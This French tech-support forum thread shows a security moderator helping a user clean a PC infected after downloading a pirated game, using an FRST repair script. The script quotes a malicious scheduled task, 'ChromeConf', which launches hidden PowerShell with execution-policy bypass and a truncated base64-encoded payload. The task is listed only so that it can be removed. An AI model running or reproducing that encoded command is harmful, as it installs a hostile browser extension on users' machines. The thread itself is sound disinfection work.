Sujet Précédent Sujet Suivant

PC infecté antivirus en combat permanent

Résolu/Fermé
BlackRainbow40 Messages postés 4 Date d'inscription mardi 11 janvier 2022 Statut Membre Dernière intervention 10 septembre 2022 - Modifié le 12 janv. 2022 à 00:26
bazfile Messages postés 54194 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 15 mai 2024 - 12 janv. 2022 à 07:34
Bonjour,
En voulant télécharger un jeux sur IGG pour le tester, j'ai choper un truc au passage.
ça a commencé par des retours au bureaux, Windows PowerShell s'ouvrait de manière intempestive.
J'ai donc utilisé la CMD/SFC/SCANNOW.
Depuis Norton ce bat en quasi permanence, il supprime a tour de bras.
Dans l'historique de l'anti-virus, c'est toujours "'SecurityRisk.URL.Redir" qui est en cause.
A force de recherche j'ai trouvé et utilisé Farbar Recovery et généré les trois liens vers les différents rapports et hébergé sur pjjoint.malekal.com.
En espérant être aller dans la bonne direction.

https://pjjoint.malekal.com/files.php?id=20220112_q9f14q13s12t9

https://pjjoint.malekal.com/files.php?id=FRST_20220112_s8d15m10z10y12

https://pjjoint.malekal.com/files.php?id=20220112_s9d11d1014e5

Je vous remercie d'avance.





Configuration: Windows / Chrome 97.0.4692.71
A voir également:

1 réponse

Réponse 1 / 1
bazfile Messages postés 54194 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 15 mai 2024 18 641
12 janv. 2022 à 00:42
Bonjour,
Procédure à faire dans l'ordre indiqué :

1- Ouvre FRST en tant qu'administrateur pour cela avec le bouton droit de ta souris sur FRST et choisis exécuter en tant qu'administrateur
2 - Copie l'intégralité du script qui est dans l'encadré qui suit : 
Start::
CreateRestorePoint:
CloseProcesses:
GroupPolicy: Restriction ?
2022-01-10 22:41 - 2022-01-10 22:41 - 000012830 _____ C:\WINDOWS\system32\Tasks\ChromeConf
Task: {030FB6D7-F34F-4F6A-808C-A28B53CFCFAB} - System32\Tasks\{FCF5D66F-C383-423C-A0E2-0A6CD913EA1D} => C:\Program Files (x86)\Sekiro Shadows Die Twice\sekiro.exe (Pas de fichier)
Task: {07635322-3923-4F4F-A3A3-E695D547CFB1} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0) (Pas de fichier)
Task: {0BCFF236-B7C6-4E8E-BF81-B93254A3DB84} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe -PvrSchedule (Pas de fichier)
Task: {0C87A864-A8D3-44BA-815F-CABBA6A185AC} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe -ObjectStoreRecoveryTask (Pas de fichier)
Task: {1B242119-636D-46F5-BE89-56D7B9348FEA} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe /OCURActivate (Pas de fichier)
Task: {34CF12D2-2B9F-444B-996F-721E8A1A66AB} - \Microsoft\Windows\Setup\EOSNotify2 -> Pas de fichier 
Task: {39557739-0E39-4389-96FB-B258DABD9E5F} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe /PBDADiscovery
Task: {4A20DB07-2CDE-4EB8-9D4C-A5527F565649} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery (Pas de fichier)
Task: {51068290-856C-41CD-BEBB-ECAA350DF1BC} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery (Pas de fichier)
Task: {536893C3-7758-4BEA-BF5C-8308551F5432} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0) (Pas de fichier)
Task: {573D7DAA-0FC3-4FC0-B4E3-C49F9FC8E8E3} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe -SqlLiteRecoveryTask (Pas de fichier)
Task: {59496A9C-7E47-4568-8C07-AE41018844A3} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe -MediaCenterRecoveryTask (Pas de fichier)
Task: {60C7F860-5862-4693-BF08-9501B2C0B9FE} - System32\Tasks\Microsoft\Windows\End Of Support\Notify1 => C:\WINDOWS\system32\sipnotify.exe -LogonOrUnlock (Pas de fichier)
Task: {65E1BAC6-747C-4473-BC8D-60AA2DFFA831} - System32\Tasks\ChromeConf => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'élément de données a 4315 caractères en plus).
Task: {676E51BC-ED84-40F5-924A-4F8F281E0D03} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0) (Pas de fichier)
Task: {6FA04CFC-3A3E-43BF-A8AF-CB09C2AC3020} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe $(Arg0) (Pas de fichier)
Task: {7D1123CA-68EC-40E7-97C6-9CBC7554386C} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0) (Pas de fichier)
Task: {821F7540-5377-489C-B77D-A67F8FA6A675} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0) (Pas de fichier)
Task: {828599D8-4D44-4C99-9F18-63A50B0F50A4} - System32\Tasks\elevator_b58b0b144169daf1a5b3ae13ea6f5142 => C:\Program Files (x86)\SimHub\SimHubWPF.exe (Pas de fichier)
Task: {BA0BF06C-16FE-479A-8044-860B822DDCE9} - System32\Tasks\{00B9768E-4F75-4C0E-8EF9-8D2780670457} => F:\Steam\steamapps\common\Crysis\Bin32\Crysis.exe (Pas de fichier)
Task: {C1983443-6757-4795-AE92-320F29F66BA9} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe /DoActivateWindowsSearch (Pas de fichier)
Task: {F2D8FF80-EAC4-4489-A43B-2B42B1BF08BF} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe -PvrRecoveryTask (Pas de fichier)
Task: {F623DA7A-35B8-495B-9530-379D4CC416CE} - \Microsoft\Windows\Setup\EOSNotify -> Pas de fichier 
CHR Extension: (Properties) - C:\Users\Utilisateur\AppData\Local [2022-01-11]
S3 NTIOLib_DVDSetup; \??\D:\NTIOLib_X64.sys [X]
AlternateDataStreams: C:\ProgramData\TEMP:2D69896E [116]
AlternateDataStreams: C:\ProgramData\TEMP:69E87FA2 [120]
BHO: Pas de nom -> {69E60676-A387-448D-B882-CBFACE0C43C1}' -> Pas de fichier
BHO-x32: Pas de nom -> {69E60676-A387-448D-B882-CBFACE0C43C1}' -> Pas de fichier
HKLM\software\microsoft\Windows\CurrentVersion\Telephony\Providers => ProviderFileName2 -> ndptsp.tsp (Pas de fichier)
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = 
cmd: netsh advfirewall reset
EmptyTemp:
End::

3- Une fois le script copié clique sur Corriger, FRST prend automatiquement le script qui est dans le presse-papier.



Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau ensuite envoie ces rapports sur https://www.cjoint.com/ voir ce tutoriel puis donne le lien généré par Cjoint dans ton prochain message.

5- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT


POUR INFORMATION:

Ta version de Windows 10 n'est pas à jour, pour le vérifier va sur cette page clique sur Mettre à jour maintenant, cela lancera le téléchargement de l'outil de Microsoft, il suffira de l'ouvrir et il te permettra de mettre à jour Windows 10 vers la dernière version et te dira si elle est compatible avec ton pc, attention cette mise à jour dure un certain temps, si tu as un pc portable branche-le au secteur, car ce serait dommage de tomber en panne de batterie avant que la mise à jour ne soit terminée.
1
BlackRainbow40 Messages postés 4 Date d'inscription mardi 11 janvier 2022 Statut Membre Dernière intervention 10 septembre 2022
12 janv. 2022 à 02:03
Super ça fait plaisirs, un grand merci.
Voila le rapport après correction :

https://www.cjoint.com/c/LAma4U5tT7D

Pour le coups j'ai acheté le jeux sans l'essayer, ça m'apprendra a être moins pingre ????
Encore merci pour ton aide. Pour le moment tout a l'air normal, en cas de pépin je reviendrais.
0
bazfile Messages postés 54194 Date d'inscription samedi 29 décembre 2012 Statut Modérateur, Contributeur sécurité Dernière intervention 15 mai 2024 18 641 > BlackRainbow40 Messages postés 4 Date d'inscription mardi 11 janvier 2022 Statut Membre Dernière intervention 10 septembre 2022
12 janv. 2022 à 07:34
Tout est OK, le problème ne devrait as revenir.

Tu peux désinstaller FRST, renomme le fichier FRST que tu as téléchargé, renomme-le en uninstall, puis une fois le fichier renommé ouvre-le, la désinstallation se fera automatiquement via un redémarrage du pc.
0